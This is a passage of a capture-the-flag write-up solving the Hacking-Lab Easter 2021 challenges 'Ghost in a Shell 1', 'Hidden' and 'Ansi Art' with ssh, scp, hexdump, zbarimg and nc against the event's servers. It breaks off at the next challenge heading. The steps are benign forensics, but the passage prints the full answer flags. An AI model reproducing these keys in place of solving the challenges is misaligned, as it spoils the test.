class=\"hl\">he2021{h3xpr3ss_urs3lf}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_10\">HE21.10 Ghost in a Shell 1<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge10.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">4 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Forensics<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\n     _, _,_  _,  _, ___   _ _, _    _,    _, _,_ __, _,  _,    ,  \r\n    \/ _ |_| \/ \\ (_   |    | |\\ |   \/_\\   (_  |_| |_  |   |     |  \r\n    \\ \/ | | \\ \/ , )  |    | | \\|   | |   , ) | | |   | , | ,   |  \r\n     ~  ~ ~  ~   ~   ~    ~ ~  ~   ~ ~    ~  ~ ~ ~~~ ~~~ ~~~   ~  \r\n   ______________________________________________________________________  \r\n    ,--.    \r\n   | oo |   \r\n   | ~~ |   o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  \r\n   |\/\\\/\\|   \r\n   ______________________________________________________________________  \r\n     \r\n   \r\nConnect to the server, snoop around, and find the flag!\r\n\r\n    - <span class=\"hl\">ssh 46.101.107.117 -p 2106 -l inky<\/span>\r\n    - password is: <span class=\"hl\">mucky_4444<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nWe start by ssh&#8217;ing to the provided machine:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/10]\r\n\u2514\u2500$ ssh 46.101.107.117 -p 2106 -l inky\r\ninky@46.101.107.117's password: \r\n\r\n  _, _,_  _,  _, ___   _ _, _    _,    _, _,_ __, _,  _,    ,\r\n \/ _ |_| \/ \\ (_   |    | |\\ |   \/_\\   (_  |_| |_  |   |     |\r\n \\ \/ | | \\ \/ , )  |    | | \\|   | |   , ) | | |   | , | ,   |\r\n  ~  ~ ~  ~   ~   ~    ~ ~  ~   ~ ~    ~  ~ ~ ~~~ ~~~ ~~~   ~\r\n______________________________________________________________________\r\n ,--.  \r\n| oo | \r\n| ~~ |   o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o\r\n|\/\\\/\\| \r\n______________________________________________________________________\r\n\r\nFind the flag!\r\n\r\n9aebfee25d34:~$\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIn the home directory of our user is a folder called <span class=\"hl\">images<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n9aebfee25d34:~$ ls -al\r\ntotal 40\r\ndrwxr-xr-x    1 root     root          4096 Apr 13 14:00 .\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 ..\r\n-rwxr-xr-x    1 root     root            15 Apr 13 14:00 .bashrc\r\n<span class=\"hl2\">drwxr-xr-x    1 root     root          4096 Apr  3 05:23 images<\/span>\r\n-rwxr-xr-x    1 root     root          2183 Feb 27 17:53 notes.txt\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 text\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAlthough it can be quickly overseen, this directory contains a directory called <span class=\"hl\">&#8220;&#8230;&#8221;<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n9aebfee25d34:~$ ls -al images\r\ntotal 304\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 .\r\ndrwxr-xr-x    1 root     root          4096 Apr 13 14:00 ..\r\n<span class=\"hl2\">drwxr-xr-x    1 root     root          4096 Apr  3 05:23 ...<\/span>\r\n-rwxr-xr-x    1 root     root         23864 Feb 27 17:53 ghost_1.png\r\n-rwxr-xr-x    1 root     root         25957 Feb 27 17:53 ghost_2.png\r\n-rwxr-xr-x    1 root     root         37335 Feb 27 17:53 ghost_3.png\r\n-rwxr-xr-x    1 root     root         30530 Feb 27 17:53 ghost_4.png\r\n-rwxr-xr-x    1 root     root         27476 Feb 27 17:53 ghost_5.png\r\n-rwxr-xr-x    1 root     root         35378 Feb 27 17:53 ghost_6.png\r\n-rwxr-xr-x    1 root     root         31358 Feb 27 17:53 ghost_7.png\r\n-rwxr-xr-x    1 root     root         32507 Feb 27 17:53 ghost_8.png\r\n-rwxr-xr-x    1 root     root         27413 Feb 27 17:53 ghost_9.png\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWithin the <span class=\"hl\">&#8220;&#8230;&#8221;<\/span> directory there is a file also called <span class=\"hl\">&#8220;&#8230;&#8221;<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n9aebfee25d34:~$ ls -al images\/...\/\r\ntotal 36\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 .\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 ..\r\n<span class=\"hl2\">-rwxr-xr-x    1 root     root         20263 Feb 27 17:53 ...<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWe can download this file to our machine using <span class=\"hl\">scp<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/10]\r\n\u2514\u2500$ scp -r -P 2106 inky@46.101.107.117:\/home\/inky\/images\/...\/... loot\r\ninky@46.101.107.117's password: \r\n..\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe file is actually an image:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/10]\r\n\u2514\u2500$ file loot                    \r\nloot: PNG image data, 1024 x 1024, 8-bit colormap, non-interlaced\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIndeed the egg:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_10_01.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe only thing left to do is scan the QR code:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/10]\r\n\u2514\u2500$ zbarimg loot                \r\nQR-Code:he2021{h1dd3n_d0td0td0t!}\r\nscanned 1 barcode symbols from 1 images in 0.05 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{h1dd3n_d0td0td0t!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_11\">HE21.11 Hidden<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge11.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">4 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Forensics<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nI swear I had the flag a minute ago, but now it seems to be hidden somewhere...\r\n\r\nGo back to level 3 and analyze the files of the challenges again. If you look hard enough, you can find an additional flag.\r\n\r\n<b>Hint<\/b>\r\n\r\nThe <b>sol<\/b>ution is hidden in an image. It's hidden in the <b>file content<\/b>, not in the image (no steganography).\r\n\r\nThere are some numbers in the flag: <span class=\"hl\">he2021{W\u26100\u2610\u2610\u2610\u2610\u2610\u2610\u2610\u2610\u2610\u2610\u26100\u2610\u2610\u26103\u2610\u2610\u2610\u2610\u26105\u2610}<\/span>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThis flag is hidden in <a href=\"#he21_08\">challenge 08<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nWhen running <span class=\"hl\">hexdump<\/span> on the provided image, we can see an ASCII art flag at the end of the output:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/08]\r\n\u2514\u2500$ hexdump -C sunshine.png\r\n00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|\r\n00000010  00 00 07 d0 00 00 05 35  08 03 00 00 00 7c f0 af  |.......5.....|..|\r\n...\r\n00119ff0  ae 42 60 82 20 5f 20 20  20 20 20 20 20 20 20 20  |.B&#x60;. _          |\r\n0011a000  20 20 20 20 7c 20 7c 5f  5f 20 20 20 20 20 20 20  |    | |__       |\r\n0011a010  20 20 20 20 7c 20 27 5f  20 5c 20 20 20 20 20 20  |    | '_ \\      |\r\n0011a020  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a030  20 20 20 20 7c 5f 7c 20  7c 5f 7c 20 20 20 20 20  |    |_| |_|     |\r\n0011a040  20 20 20 20 20 20 5f 5f  5f 20 20 20 20 20 20 20  |      ___       |\r\n0011a050  20 20 20 20 20 2f 20 5f  20 5c 20 20 20 20 20 20  |     \/ _ \\      |\r\n0011a060  20 20 20 20 7c 20 20 5f  5f 2f 20 20 20 20 20 20  |    |  __\/      |\r\n0011a070  20 20 20 20 20 5c 5f 5f  5f 7c 20 20 20 20 20 20  |     \\___|      |\r\n0011a080  20 20 20 20 20 5f 5f 5f  5f 20 20 20 20 20 20 20  |     ____       |\r\n0011a090  20 20 20 20 7c 5f 5f 5f  20 5c 20 20 20 20 20 20  |    |___ \\      |\r\n0011a0a0  20 20 20 20 20 20 5f 5f  29 20 7c 20 20 20 20 20  |      __) |     |\r\n0011a0b0  20 20 20 20 20 2f 20 5f  5f 2f 20 20 20 20 20 20  |     \/ __\/      |\r\n0011a0c0  20 20 20 20 7c 5f 5f 5f  5f 5f 7c 20 20 20 20 20  |    |_____|     |\r\n0011a0d0  20 20 20 20 20 20 5f 5f  5f 20 20 20 20 20 20 20  |      ___       |\r\n0011a0e0  20 20 20 20 20 2f 20 5f  20 5c 20 20 20 20 20 20  |     \/ _ \\      |\r\n0011a0f0  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a100  20 20 20 20 7c 20 7c 5f  7c 20 7c 20 20 20 20 20  |    | |_| |     |\r\n0011a110  20 20 20 20 20 5c 5f 5f  5f 2f 20 20 20 20 20 20  |     \\___\/      |\r\n0011a120  20 20 20 20 20 5f 5f 5f  5f 20 20 20 20 20 20 20  |     ____       |\r\n0011a130  20 20 20 20 7c 5f 5f 5f  20 5c 20 20 20 20 20 20  |    |___ \\      |\r\n0011a140  20 20 20 20 20 20 5f 5f  29 20 7c 20 20 20 20 20  |      __) |     |\r\n0011a150  20 20 20 20 20 2f 20 5f  5f 2f 20 20 20 20 20 20  |     \/ __\/      |\r\n0011a160  20 20 20 20 7c 5f 5f 5f  5f 5f 7c 20 20 20 20 20  |    |_____|     |\r\n0011a170  20 20 20 20 20 5f 20 20  20 20 20 20 20 20 20 20  |     _          |\r\n0011a180  20 20 20 20 2f 20 7c 20  20 20 20 20 20 20 20 20  |    \/ |         |\r\n0011a190  20 20 20 20 7c 20 7c 20  20 20 20 20 20 20 20 20  |    | |         |\r\n*\r\n0011a1b0  20 20 20 20 7c 5f 7c 20  20 20 20 20 20 20 20 20  |    |_|         |\r\n0011a1c0  20 20 20 20 20 20 20 5f  5f 20 20 20 20 20 20 20  |       __       |\r\n0011a1d0  20 20 20 20 20 20 2f 20  2f 20 20 20 20 20 20 20  |      \/ \/       |\r\n0011a1e0  20 20 20 20 20 7c 20 7c  20 20 20 20 20 20 20 20  |     | |        |\r\n0011a1f0  20 20 20 20 3c 20 3c 20  20 20 20 20 20 20 20 20  |    &lt; &lt;         |\r\n0011a200  20 20 20 20 20 7c 20 7c  20 20 20 20 20 20 20 20  |     | |        |\r\n0011a210  20 20 20 20 20 20 5c 5f  5c 20 20 20 20 20 20 20  |      \\_\\       |\r\n0011a220  20 20 20 20 5f 5f 20 20  20 20 20 20 20 20 5f 5f  |    __        __|\r\n0011a230  20 20 20 20 5c 20 5c 20  20 20 20 20 20 2f 20 2f  |    \\ \\      \/ \/|\r\n0011a240  20 20 20 20 20 5c 20 5c  20 2f 5c 20 2f 20 2f 20  |     \\ \\ \/\\ \/ \/ |\r\n0011a250  20 20 20 20 20 20 5c 20  56 20 20 56 20 2f 20 20  |      \\ V  V \/  |\r\n0011a260  20 20 20 20 20 20 20 5c  5f 2f 5c 5f 2f 20 20 20  |       \\_\/\\_\/   |\r\n0011a270  20 20 20 20 20 5f 20 20  20 20 20 20 20 20 20 20  |     _          |\r\n0011a280  20 20 20 20 7c 20 7c 5f  5f 20 20 20 20 20 20 20  |    | |__       |\r\n0011a290  20 20 20 20 7c 20 27 5f  20 5c 20 20 20 20 20 20  |    | '_ \\      |\r\n0011a2a0  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a2b0  20 20 20 20 7c 5f 7c 20  7c 5f 7c 20 20 20 20 20  |    |_| |_|     |\r\n0011a2c0  20 20 20 20 20 20 5f 5f  5f 20 20 20 20 20 20 20  |      ___       |\r\n0011a2d0  20 20 20 20 20 2f 20 5f  20 5c 20 20 20 20 20 20  |     \/ _ \\      |\r\n0011a2e0  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a2f0  20 20 20 20 7c 20 7c 5f  7c 20 7c 20 20 20 20 20  |    | |_| |     |\r\n0011a300  20 20 20 20 20 5c 5f 5f  5f 2f 20 20 20 20 20 20  |     \\___\/      |\r\n0011a310  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n*\r\n0011a350  20 20 20 20 20 5f 5f 5f  5f 5f 20 20 20 20 20 20  |     _____      |\r\n0011a360  20 20 20 20 7c 5f 5f 5f  5f 5f 7c 20 20 20 20 20  |    |_____|     |\r\n0011a370  20 20 20 20 20 5f 20 20  20 20 20 20 20 20 20 20  |     _          |\r\n0011a380  20 20 20 20 28 5f 29 20  20 20 20 20 20 20 20 20  |    (_)         |\r\n0011a390  20 20 20 20 7c 20 7c 20  20 20 20 20 20 20 20 20  |    | |         |\r\n*\r\n0011a3b0  20 20 20 20 7c 5f 7c 20  20 20 20 20 20 20 20 20  |    |_|         |\r\n0011a3c0  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a3d0  20 20 20 20 20 5f 5f 5f  20 20 20 20 20 20 20 20  |     ___        |\r\n0011a3e0  20 20 20 20 2f 20 5f 5f  7c 20 20 20 20 20 20 20  |    \/ __|       |\r\n0011a3f0  20 20 20 20 5c 5f 5f 20  5c 20 20 20 20 20 20 20  |    \\__ \\       |\r\n0011a400  20 20 20 20 7c 5f 5f 5f  2f 20 20 20 20 20 20 20  |    |___\/       |\r\n0011a410  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n*\r\n0011a450  20 20 20 20 20 5f 5f 5f  5f 5f 20 20 20 20 20 20  |     _____      |\r\n0011a460  20 20 20 20 7c 5f 5f 5f  5f 5f 7c 20 20 20 20 20  |    |_____|     |\r\n0011a470  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a480  20 20 20 20 20 5f 5f 5f  20 20 20 20 20 20 20 20  |     ___        |\r\n0011a490  20 20 20 20 2f 20 5f 5f  7c 20 20 20 20 20 20 20  |    \/ __|       |\r\n0011a4a0  20 20 20 20 5c 5f 5f 20  5c 20 20 20 20 20 20 20  |    \\__ \\       |\r\n0011a4b0  20 20 20 20 7c 5f 5f 5f  2f 20 20 20 20 20 20 20  |    |___\/       |\r\n0011a4c0  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a4d0  20 20 20 20 20 20 5f 5f  5f 20 20 20 20 20 20 20  |      ___       |\r\n0011a4e0  20 20 20 20 20 2f 20 5f  5f 7c 20 20 20 20 20 20  |     \/ __|      |\r\n0011a4f0  20 20 20 20 7c 20 28 5f  5f 20 20 20 20 20 20 20  |    | (__       |\r\n0011a500  20 20 20 20 20 5c 5f 5f  5f 7c 20 20 20 20 20 20  |     \\___|      |\r\n0011a510  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a520  20 20 20 20 20 20 5f 5f  20 5f 20 20 20 20 20 20  |      __ _      |\r\n0011a530  20 20 20 20 20 2f 20 5f  60 20 7c 20 20 20 20 20  |     \/ _&#x60; |     |\r\n0011a540  20 20 20 20 7c 20 28 5f  7c 20 7c 20 20 20 20 20  |    | (_| |     |\r\n0011a550  20 20 20 20 20 5c 5f 5f  2c 5f 7c 20 20 20 20 20  |     \\__,_|     |\r\n0011a560  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a570  20 20 20 20 20 5f 20 5f  5f 20 20 20 20 20 20 20  |     _ __       |\r\n0011a580  20 20 20 20 7c 20 27 5f  5f 7c 20 20 20 20 20 20  |    | '__|      |\r\n0011a590  20 20 20 20 7c 20 7c 20  20 20 20 20 20 20 20 20  |    | |         |\r\n0011a5a0  20 20 20 20 7c 5f 7c 20  20 20 20 20 20 20 20 20  |    |_|         |\r\n0011a5b0  20 20 20 20 20 20 5f 5f  5f 20 20 20 20 20 20 20  |      ___       |\r\n0011a5c0  20 20 20 20 20 2f 20 5f  20 5c 20 20 20 20 20 20  |     \/ _ \\      |\r\n0011a5d0  20 20 20 20 7c 20 20 5f  5f 2f 20 20 20 20 20 20  |    |  __\/      |\r\n0011a5e0  20 20 20 20 20 5c 5f 5f  5f 7c 20 20 20 20 20 20  |     \\___|      |\r\n0011a5f0  20 20 20 20 20 20 20 20  20 5f 20 20 20 20 20 20  |         _      |\r\n0011a600  20 20 20 20 20 20 5f 5f  7c 20 7c 20 20 20 20 20  |      __| |     |\r\n0011a610  20 20 20 20 20 2f 20 5f  60 20 7c 20 20 20 20 20  |     \/ _&#x60; |     |\r\n0011a620  20 20 20 20 7c 20 28 5f  7c 20 7c 20 20 20 20 20  |    | (_| |     |\r\n0011a630  20 20 20 20 20 5c 5f 5f  2c 5f 7c 20 20 20 20 20  |     \\__,_|     |\r\n0011a640  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n*\r\n0011a680  20 20 20 20 20 5f 5f 5f  5f 5f 20 20 20 20 20 20  |     _____      |\r\n0011a690  20 20 20 20 7c 5f 5f 5f  5f 5f 7c 20 20 20 20 20  |    |_____|     |\r\n0011a6a0  20 20 20 20 20 20 5f 5f  5f 20 20 20 20 20 20 20  |      ___       |\r\n0011a6b0  20 20 20 20 20 2f 20 5f  20 5c 20 20 20 20 20 20  |     \/ _ \\      |\r\n0011a6c0  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a6d0  20 20 20 20 7c 20 7c 5f  7c 20 7c 20 20 20 20 20  |    | |_| |     |\r\n0011a6e0  20 20 20 20 20 5c 5f 5f  5f 2f 20 20 20 20 20 20  |     \\___\/      |\r\n0011a6f0  20 20 20 20 20 20 5f 5f  20 20 20 20 20 20 20 20  |      __        |\r\n0011a700  20 20 20 20 20 2f 20 5f  7c 20 20 20 20 20 20 20  |     \/ _|       |\r\n0011a710  20 20 20 20 7c 20 7c 5f  20 20 20 20 20 20 20 20  |    | |_        |\r\n0011a720  20 20 20 20 7c 20 20 5f  7c 20 20 20 20 20 20 20  |    |  _|       |\r\n0011a730  20 20 20 20 7c 5f 7c 20  20 20 20 20 20 20 20 20  |    |_|         |\r\n0011a740  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n*\r\n0011a780  20 20 20 20 20 5f 5f 5f  5f 5f 20 20 20 20 20 20  |     _____      |\r\n0011a790  20 20 20 20 7c 5f 5f 5f  5f 5f 7c 20 20 20 20 20  |    |_____|     |\r\n0011a7a0  20 20 20 20 20 5f 20 20  20 20 20 20 20 20 20 20  |     _          |\r\n0011a7b0  20 20 20 20 7c 20 7c 5f  5f 20 20 20 20 20 20 20  |    | |__       |\r\n0011a7c0  20 20 20 20 7c 20 27 5f  20 5c 20 20 20 20 20 20  |    | '_ \\      |\r\n0011a7d0  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a7e0  20 20 20 20 7c 5f 7c 20  7c 5f 7c 20 20 20 20 20  |    |_| |_|     |\r\n0011a7f0  20 20 20 20 20 5f 5f 5f  5f 5f 20 20 20 20 20 20  |     _____      |\r\n0011a800  20 20 20 20 7c 5f 5f 5f  20 2f 20 20 20 20 20 20  |    |___ \/      |\r\n0011a810  20 20 20 20 20 20 7c 5f  20 5c 20 20 20 20 20 20  |      |_ \\      |\r\n0011a820  20 20 20 20 20 5f 5f 5f  29 20 7c 20 20 20 20 20  |     ___) |     |\r\n0011a830  20 20 20 20 7c 5f 5f 5f  5f 2f 20 20 20 20 20 20  |    |____\/      |\r\n0011a840  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a850  20 20 20 20 5f 5f 20 20  5f 5f 20 20 20 20 20 20  |    __  __      |\r\n0011a860  20 20 20 20 5c 20 5c 2f  20 2f 20 20 20 20 20 20  |    \\ \\\/ \/      |\r\n0011a870  20 20 20 20 20 3e 20 20  3c 20 20 20 20 20 20 20  |     &gt;  &lt;       |\r\n0011a880  20 20 20 20 2f 5f 2f 5c  5f 5c 20 20 20 20 20 20  |    \/_\/\\_\\      |\r\n0011a890  20 20 20 20 20 20 20 20  20 5f 20 20 20 20 20 20  |         _      |\r\n0011a8a0  20 20 20 20 20 20 5f 5f  7c 20 7c 20 20 20 20 20  |      __| |     |\r\n0011a8b0  20 20 20 20 20 2f 20 5f  60 20 7c 20 20 20 20 20  |     \/ _&#x60; |     |\r\n0011a8c0  20 20 20 20 7c 20 28 5f  7c 20 7c 20 20 20 20 20  |    | (_| |     |\r\n0011a8d0  20 20 20 20 20 5c 5f 5f  2c 5f 7c 20 20 20 20 20  |     \\__,_|     |\r\n0011a8e0  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a8f0  20 20 20 20 20 5f 20 20  20 5f 20 20 20 20 20 20  |     _   _      |\r\n0011a900  20 20 20 20 7c 20 7c 20  7c 20 7c 20 20 20 20 20  |    | | | |     |\r\n0011a910  20 20 20 20 7c 20 7c 5f  7c 20 7c 20 20 20 20 20  |    | |_| |     |\r\n0011a920  20 20 20 20 20 5c 5f 5f  2c 5f 7c 20 20 20 20 20  |     \\__,_|     |\r\n0011a930  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a940  20 20 20 20 20 5f 20 5f  5f 20 5f 5f 5f 20 20 20  |     _ __ ___   |\r\n0011a950  20 20 20 20 7c 20 27 5f  20 60 20 5f 20 5c 20 20  |    | '_ &#x60; _ \\  |\r\n0011a960  20 20 20 20 7c 20 7c 20  7c 20 7c 20 7c 20 7c 20  |    | | | | | | |\r\n0011a970  20 20 20 20 7c 5f 7c 20  7c 5f 7c 20 7c 5f 7c 20  |    |_| |_| |_| |\r\n0011a980  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |\r\n0011a990  20 20 20 20 20 5f 20 5f  5f 20 20 20 20 20 20 20  |     _ __       |\r\n0011a9a0  20 20 20 20 7c 20 27 5f  20 5c 20 20 20 20 20 20  |    | '_ \\      |\r\n0011a9b0  20 20 20 20 7c 20 7c 5f  29 20 7c 20 20 20 20 20  |    | |_) |     |\r\n0011a9c0  20 20 20 20 7c 20 2e 5f  5f 2f 20 20 20 20 20 20  |    | .__\/      |\r\n0011a9d0  20 20 20 20 7c 5f 7c 20  20 20 20 20 20 20 20 20  |    |_|         |\r\n0011a9e0  20 20 20 20 20 5f 5f 5f  5f 20 20 20 20 20 20 20  |     ____       |\r\n0011a9f0  20 20 20 20 7c 20 5f 5f  5f 7c 20 20 20 20 20 20  |    | ___|      |\r\n0011aa00  20 20 20 20 7c 5f 5f 5f  20 5c 20 20 20 20 20 20  |    |___ \\      |\r\n0011aa10  20 20 20 20 20 5f 5f 5f  29 20 7c 20 20 20 20 20  |     ___) |     |\r\n0011aa20  20 20 20 20 7c 5f 5f 5f  5f 2f 20 20 20 20 20 20  |    |____\/      |\r\n0011aa30  20 20 20 20 20 5f 5f 5f  20 20 20 20 20 20 20 20  |     ___        |\r\n0011aa40  20 20 20 20 7c 5f 5f 20  5c 20 20 20 20 20 20 20  |    |__ \\       |\r\n0011aa50  20 20 20 20 20 20 2f 20  2f 20 20 20 20 20 20 20  |      \/ \/       |\r\n0011aa60  20 20 20 20 20 7c 5f 7c  20 20 20 20 20 20 20 20  |     |_|        |\r\n0011aa70  20 20 20 20 20 28 5f 29  20 20 20 20 20 20 20 20  |     (_)        |\r\n0011aa80  20 20 20 20 5f 5f 20 20  20 20 20 20 20 20 20 20  |    __          |\r\n0011aa90  20 20 20 20 5c 20 5c 20  20 20 20 20 20 20 20 20  |    \\ \\         |\r\n0011aaa0  20 20 20 20 20 7c 20 7c  20 20 20 20 20 20 20 20  |     | |        |\r\n0011aab0  20 20 20 20 20 20 3e 20  3e 20 20 20 20 20 20 20  |      &gt; &gt;       |\r\n0011aac0  20 20 20 20 20 7c 20 7c  20 20 20 20 20 20 20 20  |     | |        |\r\n0011aad0  20 20 20 20 2f 5f 2f 20  20 20 20 20 20 20 20 20  |    \/_\/         |\r\n0011aae0  20 20 20 20 0a                                    |    .|\r\n0011aae5\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nI wasted some time trying to enter this flag for challenge 8, because I <span class=\"hl\">hexdump<\/span>&#8216;ed the image before looking at it.\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{who_is_scared_of_h3xdump5?}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_12\">HE21.12 Ansi Art<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge12.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">4 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Pwn<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nHope you like my ansi art egg!\r\n\r\nGet it with <span class=\"hl\">nc 46.101.107.117 2105<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided service outputs an ASCII art egg:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_12_01.png\" alt=\"ASCII\"\/>\r\n<\/p>\r\n\r\n<p>\r\nWe can pipe the output to a file, to further analyze it:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/12]\r\n\u2514\u2500$ nc 46.101.107.117 2105 &gt; out\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nBy running <span class=\"hl\">strings<\/span> on the output we can display the ANSI escape codes:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/12]\r\n\u2514\u2500$ strings out\r\n[38;5;16;48;5;16m\r\n[38;5;16;48;5;16m\r\n[38;5;16;48;5;16m\r\n[38;5;16;48;5;16m\r\n[38;5;16;48;5;16m\r\n...\r\n[38;5;74;48;5;235m\r\n[38;5;74;48;5;235m\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIf we filter out <span class=\"hl\">[38<\/span>, we can see the single characters of the flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/12]\r\n\u2514\u2500$ strings out | grep -v '\\[38'\r\n[30mh\r\n[31me\r\n[32m2\r\n[33m0\r\n[34m2\r\n[35m1\r\n[36m{\r\n[37m4\r\n[90mN\r\n[91ms\r\n[92m1\r\n[93mM\r\n[94mG\r\n[95m1\r\n[96mk\r\n[97m}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we only need to extract the characters:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/12]\r\n\u2514\u2500$ strings out2 | grep -v '\\[38' | grep -o '.$' | tr -d '\\n'\r\nhe2021{4Ns1MG1k}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{4Ns1MG1k}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_13\">HE21.13 No No No<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src 